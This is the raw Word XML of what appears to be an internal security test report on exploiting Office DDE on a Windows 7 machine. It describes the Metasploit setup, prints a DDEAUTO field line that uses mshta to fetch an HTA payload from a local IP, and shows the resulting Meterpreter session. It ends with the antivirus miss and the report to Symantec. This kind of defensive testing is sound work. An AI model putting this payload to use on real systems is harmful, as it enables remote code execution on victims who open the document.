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E68" w:rsidRPr="00457AD2" w:rsidRDefault="00BE1E68" w:rsidP="00BE1E68">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00457AD2">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Successful Exploitation of our Windows 7 Machine using DDE Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0743" w:rsidRDefault="00AA0743">
      <w:r>
        <w:tab/>
        <w:t>DDE stands for dynamic data exchange. I</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0743">
        <w:t xml:space="preserve">t allows data to be transferred between applications without any interaction from the user. Hackers leveraged this method to execute </w:t>
      </w:r>
      <w:r>
        <w:t>malicious scripts to compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0743" w:rsidRDefault="00AA0743">
      <w:r w:rsidRPr="00AA0743">
        <w:tab/>
        <w:t xml:space="preserve">This exploit uses </w:t>
      </w:r>
      <w:r w:rsidR="00445A7D">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0743">
        <w:t xml:space="preserve"> functionality to exploit the victim endpoint. Once the victim clicks on the word file, a HTA payload is retrieved via HTTP and session is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0743" w:rsidRPr="00AA0743" w:rsidRDefault="00AA0743">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0743">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Platforms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0743" w:rsidRDefault="00AA0743" w:rsidP="00AA0743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux 2018.2 – Attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0743" w:rsidRDefault="00AA0743" w:rsidP="00AA0743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MS Office – All Versions are vulnerable including Office 2016 fully patched</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA0743" w:rsidRDefault="006F098C" w:rsidP="00AA0743">
      <w:r>
        <w:tab/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00AA0743">
        <w:t xml:space="preserve"> exploit file can be copied from </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00AA0743" w:rsidRPr="00A83820">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/43338/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AA0743">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00AA0743" w:rsidRPr="00AA0743">
        <w:t xml:space="preserve">the code </w:t>
      </w:r>
      <w:r w:rsidR="00AA0743">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AA0743" w:rsidRPr="00AA0743">
        <w:t xml:space="preserve">for the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00CA7BF9">
        <w:t>can be</w:t>
      </w:r>
      <w:r w:rsidR="00AA0743" w:rsidRPr="00AA0743">
        <w:t xml:space="preserve"> copied into Leafpad and saved with an “.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA0743" w:rsidRPr="00AA0743">
        <w:t>rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA0743" w:rsidRPr="00AA0743">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008801C6">
        <w:t xml:space="preserve">(Raw file) </w:t>
      </w:r>
      <w:r w:rsidR="00AA0743" w:rsidRPr="00AA0743">
        <w:t>extension</w:t>
      </w:r>
      <w:r w:rsidR="00AA0743">
        <w:t xml:space="preserve"> in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753F30" w:rsidRDefault="00753F30" w:rsidP="00AA0743"/>
    <w:p w:rsidR="00AA0743" w:rsidRDefault="00AA0743" w:rsidP="00AA0743">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5178071E" wp14:editId="04B5EF6E">
            <wp:extent cx="4739640" cy="3324331"/>
            <wp:effectExtent l="0" t="0" r="38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332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743" w:rsidRDefault="00AA0743" w:rsidP="00AA0743">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The exploit URL can also be cloned directly via Terminal – </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753F30" w:rsidRDefault="007E7002" w:rsidP="00AA0743">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00AA0743">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="B22525"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery</w:t>
        </w:r>
        <w:r w:rsidR="00AA0743">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="B22525"/>
          </w:rPr>
          <w:t>.rb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005D20FE" w:rsidRDefault="00753F30" w:rsidP="00753F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27E3B" w:rsidRDefault="00753F30" w:rsidP="00753F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In Kali</w:t>
      </w:r>
      <w:r w:rsidR="005D20FE">
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007D4BD4">
        <w:t>I l</w:t>
      </w:r>
      <w:r>
        <w:t>aunch</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Te</w:t>
      </w:r>
      <w:r w:rsidR="00AE06FF">
        <w:t>rminal and start</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00AE06FF">
        <w:t xml:space="preserve"> the Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B">
        <w:t xml:space="preserve"> Framework, </w:t>
      </w:r>
      <w:r w:rsidR="00FC4DCF">
        <w:t>then</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B">
        <w:t xml:space="preserve"> cloned the Exploit file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC4DCF" w:rsidRPr="009E446B" w:rsidRDefault="00FC4DCF" w:rsidP="00FC4DCF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IPs in the Screenshot</w:t>
      </w:r>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>iffer</w:t>
      </w:r>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the Ones </w:t>
      </w:r>
      <w:r w:rsidR="005B3EDA">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>used</w:t>
      </w:r>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> wh</w:t>
      </w:r>
      <w:r w:rsidR="007A4E5B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ile</w:t>
      </w:r>
      <w:r w:rsidRPr="009E446B">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27E3B" w:rsidRDefault="00E27E3B" w:rsidP="00753F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC7C648" wp14:editId="0753CE1B">
            <wp:extent cx="5943600" cy="16935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E3B" w:rsidRDefault="00E27E3B" w:rsidP="00753F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r w:rsidR="00FC4DCF">
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the SRVHost, Payload information &amp; the LHOST to listen to the Meterpreter Session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27E3B" w:rsidRDefault="00E27E3B" w:rsidP="00E27E3B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B22D4B" wp14:editId="0ED15CE0">
            <wp:extent cx="6086383" cy="1935808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88428" cy="1936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F30" w:rsidRDefault="00F01F9E" w:rsidP="00753F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Now that the payload is created, I</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve"> copy paste</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00FC4DCF" w:rsidRPr="00FC4DCF">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve"> word document</w:t>
      </w:r>
      <w:r w:rsidR="00FC4DCF" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006377B7">
        <w:t xml:space="preserve">(office 365 pro plus </w:t>
      </w:r>
      <w:r w:rsidR="00E27E3B" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve">fully </w:t>
      </w:r>
      <w:r w:rsidR="006377B7">
        <w:t xml:space="preserve">patched), </w:t>
      </w:r>
      <w:r w:rsidR="006377B7" w:rsidRPr="00FC4DCF">
        <w:t>Embedded</w:t>
      </w:r>
      <w:r w:rsidR="00FC4DCF" w:rsidRPr="00FC4DCF">
        <w:t xml:space="preserve"> the payload using Formula &gt; Toggle code to hide the virus content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078482A" w:rsidRDefault="0078482A" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0078482A">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0078482A">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0078482A">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.1.11:8080/j5tUA4X8w0e"}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_MON_1589738550"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="002130E1" w:rsidRDefault="0078482A" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:object w:dxaOrig="1513" w:dyaOrig="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6pt;height:48pt" o:ole="">
            <v:imagedata r:id="rId13" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.Document.12" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1589741726" r:id="rId14">
            <o:FieldCodes>\s</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="002130E1" w:rsidRDefault="002130E1" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002130E1" w:rsidRDefault="002130E1" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002130E1" w:rsidRDefault="002130E1" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002130E1" w:rsidRDefault="002130E1" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This payload i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> embedded to launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> when a victim opens the Doc file, and clicks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>“Y</w:t>
      </w:r>
      <w:r w:rsidRPr="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the pop up that it shows as below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002130E1" w:rsidRDefault="002130E1" w:rsidP="002130E1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50817C6F" wp14:editId="5B1D0DF5">
            <wp:extent cx="5943600" cy="14801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0E1" w:rsidRDefault="00404497" w:rsidP="0078482A">
      <w:pPr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>Testing</w:t>
      </w:r>
      <w:r w:rsidR="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
      <w:r w:rsidR="002130E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> my machine, the meterpreter session was opened</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002130E1" w:rsidRDefault="002130E1" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053E7AF7" wp14:editId="5C1940EC">
            <wp:extent cx="5943600" cy="11385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BCE" w:rsidRDefault="00091BCE" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26B1C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">We found SEP failed to detect this </w:t>
      </w:r>
      <w:r w:rsidR="00E26B1C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00091BCE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> Below is the rating of the payload by </w:t>
      </w:r>
      <w:r w:rsidR="007F57F0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>Virus total</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091BCE" w:rsidRPr="00091BCE" w:rsidRDefault="00091BCE" w:rsidP="0078482A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3478578"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="9" name="Picture 9" descr="C:\Users\sxn7443\Pictures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xn7443\Pictures\Capture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8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BCE" w:rsidRDefault="00775CF0" w:rsidP="00775CF0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="228"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Since SEP failed to detect the payload,</w:t>
      </w:r>
      <w:r w:rsidR="00091BCE">
        <w:t xml:space="preserve"> we submitted the file to Symantec Support via </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00091BCE" w:rsidRPr="008F22C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://submit.symantec.com/websubmit/retail.cgi</w:t>
        </w:r>
        <w:r w:rsidR="00091BCE" w:rsidRPr="008F22C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00091BCE" w:rsidRDefault="001B71A7" w:rsidP="00091BCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:object w:dxaOrig="1513" w:dyaOrig="960">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:75.6pt;height:48pt" o:ole="">
            <v:imagedata r:id="rId19" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1027" DrawAspect="Icon" ObjectID="_1589741727" r:id="rId20"/>
        </w:object>
      </w:r>
      <w:r w:rsidR="00091BCE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091BCE" w:rsidRPr="00091BCE" w:rsidRDefault="00091BCE" w:rsidP="00091BCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:object w:dxaOrig="1513" w:dyaOrig="960">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:75.6pt;height:48pt" o:ole="">
            <v:imagedata r:id="rId21" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Icon" ObjectID="_1589741728" r:id="rId22"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00091BCE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091BCE" w:rsidRDefault="00091BCE" w:rsidP="00091BCE">
      <w:r w:rsidRPr="00091BCE">
        <w:t xml:space="preserve">Symantec Team assessed it to be </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00091BCE">
        <w:t xml:space="preserve"> Threat &amp; updated the signature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00091BCE" w:rsidRDefault="00091BCE" w:rsidP="00091BCE"/>
    <w:p w:rsidR="00091BCE" w:rsidRDefault="00091BCE" w:rsidP="00091BCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5042936A" wp14:editId="0E7E732F">
            <wp:extent cx="5943600" cy="14681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BCE" w:rsidRDefault="00091BCE" w:rsidP="00091BCE">
      <w:r>
        <w:t>Now the file is blocked after 2 days.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003536FB" w:rsidRDefault="00091BCE" w:rsidP="00091BCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
